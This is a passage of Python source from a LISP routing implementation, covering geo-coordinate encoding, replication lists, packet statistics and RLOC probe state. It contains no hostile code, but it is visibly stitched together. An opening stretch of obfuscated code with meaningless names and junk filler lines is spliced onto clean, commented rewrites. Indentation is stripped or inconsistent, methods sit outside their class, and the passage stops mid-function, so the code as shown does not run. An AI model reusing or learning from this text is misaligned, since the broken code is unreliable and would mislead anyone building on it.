self . latitude = int ( iiIiiiI [ 0 ] )
self . lat_mins = int ( iiIiiiI [ 1 ] )
self . lat_secs = int ( iiIiiiI [ 2 ] )
if ( iiIiiiI [ 3 ] == "N" ) : self . latitude = - self . latitude
if 92 - 92: i11iIiiIii * IiII * I1IiiI - oO0o / iII111i
if 1 - 1: ooOoO0o - OoO0O00 - o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i - I1Ii111
if 78 - 78: Oo0Ooo
if 27 - 27: Ii1I / oO0o - Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo . Ii1I
self . longitude = int ( i1i11i1Iii [ 0 ] )
self . long_mins = int ( i1i11i1Iii [ 1 ] )
self . long_secs = int ( i1i11i1Iii [ 2 ] )
if ( i1i11i1Iii [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 79 - 79: Ii1I % O0 * OOooOOo
if 41 - 41: I1ii11iIi11i . OoooooooOO * I1ii11iIi11i - oO0o
def print_geo ( self ) :
IiIIiiI1II = "N" if self . latitude < 0 else "S"
oo0 = "E" if self . longitude < 0 else "W"
if 58 - 58: I1IiiI * I1Ii111 + iII111i + iIii1I11I1II1 + I1IiiI
OooO0ooO0o0OO = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , IiIIiiI1II , abs ( self . longitude ) ,
self . long_mins , self . long_secs , oo0 )
if 78 - 78: Oo0Ooo + ooOoO0o
if ( self . no_geo_altitude ( ) == False ) :
OooO0ooO0o0OO += "-" + str ( self . altitude )
if 56 - 56: OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
if ( self . radius != 0 ) : OooO0ooO0o0OO += "/{}" . format ( self . radius )
return ( OooO0ooO0o0OO )
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
def geo_url ( self ) :
Iii1ii = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
Iii1ii = "10" if ( Iii1ii == "" or Iii1ii . isdigit ( ) == False ) else Iii1ii
Ooo0oOO , I1Ii111Oo00o0o = self . dms_to_decimal ( )
o00oo0oo = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( Ooo0oOO , I1Ii111Oo00o0o , Ooo0oOO , I1Ii111Oo00o0o ,
# Oo0Ooo * o0oOOo0O0Ooo * I1ii11iIi11i * II111iiii
# o0oOOo0O0Ooo . iIii1I11I1II1 + ooOoO0o + II111iiii % iIii1I11I1II1 * IiII
Iii1ii )
return ( o00oo0oo )
if 89 - 89: O0 + I1IiiI / IiII + OoooooooOO - IiII
if 2 - 2: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1 % i11iIiiIii * OOooOOo
def print_geo_url ( self ) :
iiIi1ii1IiI = self . print_geo ( )
if ( self . radius == 0 ) :
o00oo0oo = self . geo_url ( )
iI = "<a href='{}'>{}</a>" . format ( o00oo0oo , iiIi1ii1IiI )
else :
o00oo0oo = iiIi1ii1IiI . replace ( "/" , "-" )
iI = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( o00oo0oo , iiIi1ii1IiI )
if 18 - 18: oO0o . I1ii11iIi11i % oO0o
return ( iI )
if 43 - 43: oO0o / ooOoO0o . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: iII111i * iII111i
def dms_to_decimal ( self ) :
Ooooooo0Oo , Ii1III11i , o0o0 = self . latitude , self . lat_mins , self . lat_secs
oOo00Oo0o = float ( abs ( Ooooooo0Oo ) )
oOo00Oo0o += float ( Ii1III11i * 60 + o0o0 ) / 3600
if ( Ooooooo0Oo > 0 ) : oOo00Oo0o = - oOo00Oo0o
oo00ooO0ooO = oOo00Oo0o
if 72 - 72: I1Ii111 * oO0o * iII111i * OoooooooOO % I1IiiI / OOooOOo
Ooooooo0Oo , Ii1III11i , o0o0 = self . longitude , self . long_mins , self . long_secs
oOo00Oo0o = float ( abs ( Ooooooo0Oo ) )
oOo00Oo0o += float ( Ii1III11i * 60 + o0o0 ) / 3600
if ( Ooooooo0Oo > 0 ) : oOo00Oo0o = - oOo00Oo0o
iI1II1I = oOo00Oo0o
return ( ( oo00ooO0ooO , iI1II1I ) )
if 27 - 27: Ii1I % IiII
if 100 - 100: oO0o . i11iIiiIii - ooOoO0o
def get_distance ( self , geo_point ) :
II11II1111 = self . dms_to_decimal ( )
IiiiOo = geo_point . dms_to_decimal ( )
O00oO00O0 = vincenty ( II11II1111 , IiiiOo )
return ( O00oO00O0 . km )
if 96 - 96: IiII * iIii1I11I1II1
if 75 - 75: oO0o + o0oOOo0O0Ooo . Ii1I * OoooooooOO + Ii1I - I1IiiI
def point_in_circle ( self , geo_point ) :
i1ii = self . get_distance ( geo_point )
return ( i1ii <= self . radius )
if 86 - 86: O0 * oO0o + Oo0Ooo / II111iiii + i1IIi
if 12 - 12: I1IiiI + OOooOOo / Ii1I % i11iIiiIii - I1Ii111 % I11i
 def encode_geo ( self ) :
  # Encode this geo-point as a Geo-Coordinate LCAF (AFI + header + body).
  # Minutes/seconds travel as milliseconds of arc split hi-byte/lo-word.
  o0O000Ooo = socket . htons ( LISP_AFI_LCAF )
  o0o0O0O0Oooo0 = socket . htons ( 20 + 2 )
  ooOOooooo0Oo = 0
  if 49 - 49: I11i * i1IIi - iII111i
  Ooo0oOO = abs ( self . latitude )
  Oo000ooo = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
  # Flag 0x40: stored-negative (north) latitude.
  if ( self . latitude < 0 ) : ooOOooooo0Oo |= 0x40
  if 90 - 90: Ii1I * Ii1I % i11iIiiIii
  I1Ii111Oo00o0o = abs ( self . longitude )
  O0o0oo0o0o = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
  # Flag 0x20: stored-negative (east) longitude.
  if ( self . longitude < 0 ) : ooOOooooo0Oo |= 0x20
  if 94 - 94: i11iIiiIii % I1ii11iIi11i % IiII - I1Ii111
  O0O0OooO = 0
  # Flag 0x10: altitude field is valid.
  if ( self . no_geo_altitude ( ) == False ) :
   O0O0OooO = socket . htonl ( self . altitude )
   ooOOooooo0Oo |= 0x10
  if 88 - 88: I1ii11iIi11i . i1IIi * iII111i
  Iii1Ii1II1 = socket . htons ( self . radius )
  # Flags 0x06: radius present (in km units).
  if ( Iii1Ii1II1 != 0 ) : ooOOooooo0Oo |= 0x06
  if 67 - 67: IiII + i11iIiiIii . II111iiii / OoOoOO00 + OoooooooOO + i11iIiiIii
  iiIiIi = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
   0 , o0o0O0O0Oooo0 )
  iiIiIi += struct . pack ( "BBHBBHBBHIHHH" , ooOOooooo0Oo , 0 , 0 , Ooo0oOO , Oo000ooo >> 16 ,
   socket . htons ( Oo000ooo & 0x0ffff ) , I1Ii111Oo00o0o , O0o0oo0o0o >> 16 ,
   socket . htons ( O0o0oo0o0o & 0xffff ) , O0O0OooO , Iii1Ii1II1 , 0 , 0 )
  if 65 - 65: I11i * iII111i * II111iiii / o0oOOo0O0Ooo . O0
  return ( iiIiIi )
if 11 - 11: Ii1I . OoooooooOO
if 34 - 34: iIii1I11I1II1 . i11iIiiIii - OoOoOO00
def decode_geo(self, packet, lcaf_len, radius_hi):
    """Decode a LISP LCAF Geo-Coordinates payload into this object.

    Returns the remaining packet bytes past the geo fields (plus any
    trailing RLOC address), or None on a malformed payload.
    NOTE(review): integer '/' division below is Python-2 floor division
    for the mins/secs math — keep it as-is.
    """
    fmt = "BBHBBHBBHIHHH"
    fmt_size = struct.calcsize(fmt)
    if (lcaf_len < fmt_size): return(None)

    flags, unused1, unused2, lat, lat_hi, lat_lo, lon, lon_hi, lon_lo, \
        alt, radius, unused3, afi = struct.unpack(fmt, packet[:fmt_size])

    afi = socket.ntohs(afi)
    # A nested LCAF AFI in the locator slot is not supported.
    if (afi == LISP_AFI_LCAF): return(None)

    if (flags & 0x40): lat = -lat
    self.latitude = lat
    lat_msecs = ((lat_hi << 16) | socket.ntohs(lat_lo)) / 1000
    self.lat_mins = lat_msecs / 60
    self.lat_secs = lat_msecs % 60

    if (flags & 0x20): lon = -lon
    self.longitude = lon
    lon_msecs = ((lon_hi << 16) | socket.ntohs(lon_lo)) / 1000
    self.long_mins = lon_msecs / 60
    self.long_secs = lon_msecs % 60

    # 0x10 means an altitude was encoded; -1 marks "no altitude".
    self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
    radius = socket.ntohs(radius)
    # 0x02 set means radius already in km, otherwise it was in 1000s.
    self.radius = radius if (flags & 0x02) else radius * 1000

    self.geo_name = None
    packet = packet[fmt_size::]

    if (afi != 0):
        self.rloc.afi = afi
        packet = self.rloc.unpack_address(packet)
        self.rloc.mask_len = self.rloc.host_mask_len()
    return(packet)
class lisp_rle_node():
    """One replication node inside an RLE (Replication List Entry)."""

    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)  # node RLOC
        self.level = 0               # replication level within the RLE
        self.translated_port = 0     # NAT-translated encap port, 0 if none
        self.rloc_name = None        # optional RLOC name string

    def copy_rle_node(self):
        """Return a fresh lisp_rle_node with this node's values."""
        duplicate = lisp_rle_node()
        duplicate.address.copy_address(self.address)
        duplicate.level = self.level
        duplicate.translated_port = self.translated_port
        duplicate.rloc_name = self.rloc_name
        return(duplicate)

    def store_translated_rloc(self, rloc, port):
        """Record the NAT-translated address and encap port for this node."""
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        """Look up the encap crypto keys for this node's address/port.

        Returns (encrypt_key, icv_key), or (None, None) when no usable
        key state exists.
        """
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.address.print_address_no_iid() + ":" + port
        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            # No key state (or global table missing) — best effort.
            return(None, None)
class lisp_rle():
    """A Replication List Entry: an ordered list of replication nodes
    plus the subset currently used for forwarding."""

    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []

    def copy_rle(self):
        """Deep-copy this RLE (nodes copied individually) and rebuild
        its forwarding list."""
        duplicate = lisp_rle(self.rle_name)
        for node in self.rle_nodes:
            duplicate.rle_nodes.append(node.copy_rle_node())
        duplicate.build_forwarding_list()
        return(duplicate)

    def print_rle(self, html, do_formatting):
        """Return a display string 'addr[:port](Llevel)name, ...' for all
        nodes; empty string when there are no nodes."""
        pieces = []
        for node in self.rle_nodes:
            port = node.translated_port

            name_str = ""
            if (node.rloc_name != None):
                name_str = node.rloc_name
                if (do_formatting): name_str = blue(name_str, html)

            addr_str = node.address.print_address_no_iid()
            if (node.address.is_local()): addr_str = red(addr_str, html)
            pieces.append("{}{}(L{}){}".format(addr_str,
                "" if port == 0 else ":" + str(port), node.level,
                "" if node.rloc_name == None else name_str))
        return(", ".join(pieces))

    def build_forwarding_list(self):
        """Select the replication level this system forwards at and build
        rle_forwarding_list from nodes at that level (level 128 is also
        taken when the chosen level is 0)."""
        chosen_level = -1
        for node in self.rle_nodes:
            if (chosen_level == -1):
                if (node.address.is_local()): chosen_level = node.level
            else:
                if (node.level > chosen_level): break

        # No local node found means forward at level 0; otherwise use the
        # level of the last node examined.
        chosen_level = 0 if chosen_level == -1 else node.level

        self.rle_forwarding_list = []
        for node in self.rle_nodes:
            if (node.level == chosen_level or (chosen_level == 0 and
                node.level == 128)):
                # An ITR/ETR does not replicate to itself.
                if (lisp_i_am_rtr == False and node.address.is_local()):
                    addr_str = node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue
                self.rle_forwarding_list.append(node)
class lisp_json():
    """A named JSON blob stored in the global lisp_json_list registry."""

    def __init__(self, name, string):
        self.json_name = name      # registry key
        self.json_string = string  # raw JSON text (may be invalid)

    def add(self):
        """Insert (or replace) this entry in the global registry."""
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        """Remove this entry from the global registry.

        Fix: dict.has_key() is Python-2-only; the `in` operator is the
        idiomatic and portable membership test.
        """
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            # NOTE(review): the key is deliberately re-inserted with a
            # None placeholder, matching the original behavior.
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        """Return the JSON text; invalid JSON is wrapped in '***'
        markers (colored red when html is set)."""
        good_string = self.json_string
        marker = "***"
        if (html): marker = red(marker, html)
        bad_string = marker + self.json_string + marker
        if (self.valid_json()): return(good_string)
        return(bad_string)

    def valid_json(self):
        """True when json_string parses as JSON."""
        try:
            json.loads(self.json_string)
        except:
            return(False)
        return(True)
class lisp_stats():
    """Packet/byte counters with rate computation and display helpers."""

    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0       # timestamp of last get_stats()
        self.last_packet_count = 0     # counters at last rate check
        self.last_byte_count = 0
        self.last_increment = None     # timestamp of last increment()

    def increment(self, octets):
        """Count one packet of `octets` bytes."""
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        """True when a packet was counted within the last second."""
        if (self.last_increment == None): return(False)
        idle = time.time() - self.last_increment
        return(idle <= 1)

    def recent_packet_min(self):
        """True when a packet was counted within the last minute."""
        if (self.last_increment == None): return(False)
        idle = time.time() - self.last_increment
        return(idle <= 60)

    def stat_colors(self, c1, c2, html):
        """Color the two count strings by traffic recency."""
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))
        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))
        return(c1, c2)

    def normalize(self, count):
        """Abbreviate a large counter: T/B/M suffixed strings.

        NOTE(review): the M branch keeps a single fractional digit while
        T keeps three and B keeps two — preserved from the original.
        """
        count = str(count)
        digits = len(count)
        if (digits > 12):
            return(count[0:-10] + "." + count[-10:-7] + "T")
        if (digits > 9):
            return(count[0:-9] + "." + count[-9:-7] + "B")
        if (digits > 6):
            return(count[0:-6] + "." + count[-6] + "M")
        return(count)

    def get_stats(self, summary, html):
        """Return a display string of counts and rates since the last
        call (summary form uses a hover span when html is set)."""
        prev_check = self.last_rate_check
        prev_packets = self.last_packet_count
        prev_bytes = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        elapsed = self.last_rate_check - prev_check
        if (elapsed == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int((self.packet_count - prev_packets) / elapsed)
            bit_rate = (self.byte_count - prev_bytes) / elapsed
            bit_rate = (bit_rate * 8) / 1000000
            bit_rate = round(bit_rate, 2)

        pc_str = self.normalize(self.packet_count)
        bc_str = self.normalize(self.byte_count)

        if (summary):
            sep = "<br>" if html else ""
            pc_str, bc_str = self.stat_colors(pc_str, bc_str, html)
            hover = "packet-count: {}{}byte-count: {}".format(pc_str, sep,
                bc_str)
            output = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)
            if (html != ""): output = lisp_span(hover, output)
        else:
            pr_str = str(packet_rate)
            br_str = str(bit_rate)
            if (html):
                pc_str = lisp_print_cour(pc_str)
                pr_str = lisp_print_cour(pr_str)
                bc_str = lisp_print_cour(bc_str)
                br_str = lisp_print_cour(br_str)
            sep = "<br>" if html else ", "
            output = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " +
                "{}{}bit-rate: {} mbps").format(pc_str, sep, pr_str, sep,
                bc_str, sep, br_str)
        return(output)
# Per-category decapsulation counters, each backed by its own lisp_stats.
lisp_decap_stats = {
    category: lisp_stats() for category in (
        "good-packets", "ICV-error", "checksum-error", "lisp-header-error",
        "no-decrypt-key", "bad-inner-version", "outer-header-error"
    )
}
class lisp_rloc ( ) :
def __init__(self, recurse=True):
    """Initialize RLOC state. When recurse is True and the system has
    multiple default-route next-hops, chain one deep-copied lisp_rloc
    per extra next-hop via self.next_rloc."""
    self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.rloc_name = None
    self.interface = None
    self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.translated_port = 0
    self.priority = 255
    self.weight = 0
    self.mpriority = 255
    self.mweight = 0
    self.uptime = 0
    self.state = LISP_RLOC_UP_STATE
    self.last_state_change = None
    self.rle_name = None
    self.elp_name = None
    self.geo_name = None
    self.json_name = None
    self.geo = None
    self.elp = None
    self.rle = None
    self.json = None
    self.stats = lisp_stats()
    self.last_rloc_probe = None
    self.last_rloc_probe_reply = None
    self.rloc_probe_rtt = -1
    self.recent_rloc_probe_rtts = [-1, -1, -1]
    self.rloc_probe_hops = "?/?"
    self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
    self.last_rloc_probe_nonce = 0
    self.echo_nonce_capable = False
    self.map_notify_requested = False
    self.rloc_next_hop = None
    self.next_rloc = None

    if (recurse == False): return

    #
    # Multihomed: one chained copy of this RLOC per extra next-hop.
    #
    next_hops = lisp_get_default_route_next_hops()
    if (next_hops == [] or len(next_hops) == 1): return

    self.rloc_next_hop = next_hops[0]
    tail = self
    for nh in next_hops[1::]:
        # NOTE(review): this construction is immediately overwritten by
        # the deepcopy below (dead store kept from the original).
        hop_rloc = lisp_rloc(False)
        hop_rloc = copy.deepcopy(self)
        hop_rloc.rloc_next_hop = nh
        tail.next_rloc = hop_rloc
        tail = hop_rloc
def up_state(self):
    """True when this RLOC is in the up state."""
    is_up = (self.state == LISP_RLOC_UP_STATE)
    return(is_up)
def unreach_state(self):
    """True when this RLOC is in the unreachable state."""
    is_unreach = (self.state == LISP_RLOC_UNREACH_STATE)
    return(is_unreach)
def no_echoed_nonce_state(self):
    """True when this RLOC is in the no-echoed-nonce state."""
    no_echo = (self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
    return(no_echo)
def down_state(self):
    """True when this RLOC is down (operationally or administratively)."""
    down_states = [LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE]
    return(self.state in down_states)
def print_state(self):
    """Return the display name for this RLOC's state.

    Fix: the original compared the state constants with `is`, which
    tests object identity and only works for small ints because of
    CPython interning; `==` is the correct equality comparison.
    """
    if (self.state == LISP_RLOC_UNKNOWN_STATE):
        return("unknown-state")
    if (self.state == LISP_RLOC_UP_STATE):
        return("up-state")
    if (self.state == LISP_RLOC_DOWN_STATE):
        return("down-state")
    if (self.state == LISP_RLOC_ADMIN_DOWN_STATE):
        return("admin-down-state")
    if (self.state == LISP_RLOC_UNREACH_STATE):
        return("unreach-state")
    if (self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE):
        return("no-echoed-nonce-state")
    return("invalid-state")
def print_rloc(self, indent):
    """Log a one-line summary of this RLOC (address, uptime, state,
    unicast/multicast priority and weight)."""
    uptime_str = lisp_print_elapsed(self.uptime)
    summary = "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(
        indent, red(self.rloc.print_address(), False), uptime_str,
        self.print_state(), self.priority, self.weight, self.mpriority,
        self.mweight)
    lprint(summary)
def print_rloc_name(self, cour=False):
    """Return 'rloc-name: <name>' (courier/blue formatted), or '' when
    this RLOC has no name."""
    if (self.rloc_name == None): return("")
    name = self.rloc_name
    if (cour): name = lisp_print_cour(name)
    return('rloc-name: {}'.format(blue(name, cour)))
def store_rloc_from_record(self, rloc_record, nonce, source):
    """Populate this RLOC from a received RLOC-record, applying any
    stored NAT translation state, copying geo/ELP/RLE/JSON locator
    info, and storing encap crypto keys. Returns the encap port."""
    port = LISP_DATA_PORT
    self.rloc.copy_address(rloc_record.rloc)
    self.rloc_name = rloc_record.rloc_name

    #
    # Apply NAT translation state, if any exists for this RLOC/name.
    #
    rloc = self.rloc
    if (rloc.is_null() == False):
        nat_info = lisp_get_nat_info(rloc, self.rloc_name)
        if (nat_info):
            port = nat_info.port
            youngest = lisp_nat_state_info[self.rloc_name][0]
            addr_str = rloc.print_address_no_iid()
            red_addr = red(addr_str, False)
            name_str = "" if self.rloc_name == None else \
                blue(self.rloc_name, False)

            #
            # When the matched state is stale, fall back to the youngest
            # entry (unless that is the same entry or also stale).
            #
            if (nat_info.timed_out()):
                lprint((" Matched stored NAT state timed out for " +
                    "RLOC {}:{}, {}").format(red_addr, port, name_str))

                nat_info = None if (nat_info == youngest) else youngest
                if (nat_info and nat_info.timed_out()):
                    port = nat_info.port
                    red_addr = red(nat_info.address, False)
                    lprint((" Youngest stored NAT state timed out " +
                        " for RLOC {}:{}, {}").format(red_addr, port,
                        name_str))
                    nat_info = None

            #
            # Usable NAT state: use the translated address and port.
            #
            if (nat_info):
                if (nat_info.address != addr_str):
                    lprint("RLOC conflict, RLOC-record {}, NAT state {}".format(red_addr, red(nat_info.address, False)))
                    self.rloc.store_address(nat_info.address)

                red_addr = red(nat_info.address, False)
                port = nat_info.port
                lprint(" Use NAT translated RLOC {}:{} for {}".format(red_addr, port, name_str))
                self.store_translated_rloc(rloc, port)

    self.geo = rloc_record.geo
    self.elp = rloc_record.elp
    self.json = rloc_record.json

    #
    # For an RLE, propagate translated encap-ports to each node.
    #
    self.rle = rloc_record.rle
    if (self.rle):
        for rle_node in self.rle.rle_nodes:
            node_name = rle_node.rloc_name
            nat_info = lisp_get_nat_info(rle_node.address, node_name)
            if (nat_info == None): continue

            port = nat_info.port
            name_str = node_name
            if (name_str): name_str = blue(node_name, False)

            lprint((" Store translated encap-port {} for RLE-" +
                "node {}, rloc-name '{}'").format(port,
                rle_node.address.print_address_no_iid(), name_str))
            rle_node.translated_port = port

    self.priority = rloc_record.priority
    self.mpriority = rloc_record.mpriority
    self.weight = rloc_record.weight
    self.mweight = rloc_record.mweight
    if (rloc_record.reach_bit and rloc_record.local_bit and
        rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE

    #
    # Store security keys only when the record came from the RLOC itself.
    #
    probing_rloc = source.is_exact_match(rloc_record.rloc) if \
        source != None else None
    if (rloc_record.keys != None and probing_rloc):
        key = rloc_record.keys[1]
        if (key != None):
            addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
                str(port)
            key.add_key_by_rloc(addr_str, True)
            lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format(lisp_hex_string(nonce), red(addr_str, False)))
    return(port)
def store_translated_rloc(self, rloc, port):
    """Record a NAT-translated address/port for this RLOC (both the
    live address and the translated copy are updated)."""
    self.rloc.copy_address(rloc)
    self.translated_rloc.copy_address(rloc)
    self.translated_port = port
def is_rloc_translated(self):
    """True when NAT translation state has been stored for this RLOC."""
    no_translation = self.translated_rloc.is_null()
    return(no_translation == False)
def rloc_exists(self):
    """True when this entry carries an RLOC address, or carries nothing
    at all; False when only a name-based locator (RLE/geo/ELP/JSON)
    is present."""
    if (self.rloc.is_null() == False): return(True)
    name_based = (self.rle_name or self.geo_name or self.elp_name or
        self.json_name)
    if (name_based):
        return(False)
    return(True)
def is_rtr(self):
    """True when priorities/weights carry the RTR signature
    (priority 254, mpriority 255, both weights 0)."""
    rtr_priorities = (self.priority == 254 and self.mpriority == 255)
    rtr_weights = (self.weight == 0 and self.mweight == 0)
    return(rtr_priorities and rtr_weights)
def print_state_change(self, new_state):
    """Return 'old -> new' transition text; bolded when an unreachable
    RLOC is coming back up."""
    current = self.print_state()
    transition = "{} -> {}".format(current, new_state)
    if (new_state == "up" and self.unreach_state()):
        transition = bold(transition, False)
    return(transition)
def print_rloc_probe_rtt(self):
    """Return the last probe RTT, or 'none' when never measured."""
    rtt = self.rloc_probe_rtt
    return("none" if rtt == -1 else rtt)
def print_recent_rloc_probe_rtts(self):
    """Return recent RTT history as a string, with -1 shown as '?'."""
    history = str(self.recent_rloc_probe_rtts)
    return(history.replace("-1", "?"))
def compute_rloc_probe_rtt(self):
    """Compute the probe round-trip time from the last request/reply
    timestamps and push the previous RTT into the recent history."""
    previous = self.rloc_probe_rtt
    self.rloc_probe_rtt = -1
    if (self.last_rloc_probe_reply == None): return
    if (self.last_rloc_probe == None): return
    self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
    self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
    history = self.recent_rloc_probe_rtts
    self.recent_rloc_probe_rtts = [previous] + history[0:-1]
def print_rloc_probe_hops(self):
    """Return the 'to/from' hop-count display string."""
    hops = self.rloc_probe_hops
    return(hops)
def print_recent_rloc_probe_hops(self):
    """Return recent hop-count history as a string."""
    history = str(self.recent_rloc_probe_hops)
    return(history)
def store_rloc_probe_hops(self, to_hops, from_ttl):
    """Record hop counts as 'to/from', derived from the probe TTLs.

    '?' means unknown; '!' means the TTL was implausibly low (less than
    half the probe's initial TTL). Note '/' is Python-2 floor division
    on ints here.
    """
    if (to_hops == 0):
        to_hops = "?"
    elif (to_hops < LISP_RLOC_PROBE_TTL / 2):
        to_hops = "!"
    else:
        to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)

    if (from_ttl < LISP_RLOC_PROBE_TTL / 2):
        from_hops = "!"
    else:
        from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)

    previous = self.rloc_probe_hops
    history = self.recent_rloc_probe_hops
    self.rloc_probe_hops = to_hops + "/" + from_hops
    self.recent_rloc_probe_hops = [previous] + history[0:-1]
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
    """Handle an RLOC-probe reply: match the nonce along the next-hop
    chain, mark that RLOC up, record RTT/hops, and (for multihomed
    next-hop RLOCs) install a host route via the best-RTT next-hop."""
    rloc = self
    while (True):
        if (rloc.last_rloc_probe_nonce == nonce): break
        rloc = rloc.next_rloc
        if (rloc == None):
            lprint(" No matching nonce state found for nonce 0x{}".format(lisp_hex_string(nonce)))
            return

    #
    # Matched — record reply time, compute RTT, bring RLOC up.
    #
    rloc.last_rloc_probe_reply = lisp_get_timestamp()
    rloc.compute_rloc_probe_rtt()
    updown = rloc.print_state_change("up")
    if (rloc.state != LISP_RLOC_UP_STATE):
        lisp_update_rtr_updown(rloc.rloc, True)
        rloc.state = LISP_RLOC_UP_STATE
        rloc.last_state_change = lisp_get_timestamp()
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)

    rloc.store_rloc_probe_hops(hop_count, ttl)

    probe = bold("RLOC-probe reply", False)
    addr_str = rloc.rloc.print_address_no_iid()
    rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
    port_str = ":{}".format(self.translated_port) if \
        self.translated_port != 0 else ""

    nh_str = ""
    if (rloc.rloc_next_hop != None):
        device, gateway = rloc.rloc_next_hop
        nh_str = ", nh {}({})".format(gateway, device)

    eid_str = green(lisp_print_eid_tuple(eid, group), False)
    lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " +
        "to-ttl/from-ttl {}").format(probe, red(addr_str, False), port_str,
        eid_str, updown, rtt, nh_str, str(hop_count) + "/" + str(ttl)))

    if (rloc.rloc_next_hop == None): return

    #
    # Multihomed: pick the up RLOC with the smallest measured RTT and
    # point the host route at its next-hop.
    #
    rloc = None
    best = None
    while (True):
        rloc = self if rloc == None else rloc.next_rloc
        if (rloc == None): break
        if (rloc.up_state() == False): continue
        if (rloc.rloc_probe_rtt == -1): continue
        if (best == None): best = rloc
        if (rloc.rloc_probe_rtt < best.rloc_probe_rtt): best = rloc

    if (best != None):
        device, gateway = best.rloc_next_hop
        nh_str = bold("nh {}({})".format(gateway, device), False)
        lprint(" Install host-route via best {}".format(nh_str))
        lisp_install_host_route(addr_str, None, False)
        lisp_install_host_route(addr_str, gateway, True)
def add_to_rloc_probe_list(self, eid, group):
    """Register this RLOC (keyed by address[:port]) with the EID/group
    in the global RLOC-probe list, replacing any previous entry for the
    same EID/group, and inherit unreachable state from the list head.

    Fix: dict.has_key() is Python-2-only; `in`/`not in` is the idiomatic
    and portable membership test.
    """
    addr_str = self.rloc.print_address_no_iid()
    port = self.translated_port
    if (port != 0): addr_str += ":" + str(port)

    if (addr_str not in lisp_rloc_probe_list):
        lisp_rloc_probe_list[addr_str] = []

    if (group.is_null()): group.instance_id = 0
    for r, e, g in lisp_rloc_probe_list[addr_str]:
        if (e.is_exact_match(eid) and g.is_exact_match(group)):
            if (r == self):
                # Same rloc/eid/group already present — nothing to do.
                if (lisp_rloc_probe_list[addr_str] == []):
                    lisp_rloc_probe_list.pop(addr_str)
                return
            # A different rloc object for this eid/group — replace it.
            lisp_rloc_probe_list[addr_str].remove([r, e, g])
            break

    lisp_rloc_probe_list[addr_str].append([self, eid, group])

    #
    # If the address is already deemed unreachable, mark this entry too.
    #
    head = lisp_rloc_probe_list[addr_str][0][0]
    if (head.state == LISP_RLOC_UNREACH_STATE):
        self.state = LISP_RLOC_UNREACH_STATE
        self.last_state_change = lisp_get_timestamp()
def delete_from_rloc_probe_list(self, eid, group):
    """Remove this RLOC's entry for the given EID/group from the global
    RLOC-probe list; drop the address key when its list empties.

    Fix: dict.has_key() is Python-2-only; `not in` is the idiomatic and
    portable membership test.
    """
    addr_str = self.rloc.print_address_no_iid()
    port = self.translated_port
    if (port != 0): addr_str += ":" + str(port)
    if (addr_str not in lisp_rloc_probe_list): return

    found = []
    for entry in lisp_rloc_probe_list[addr_str]:
        if (entry[0] != self): continue
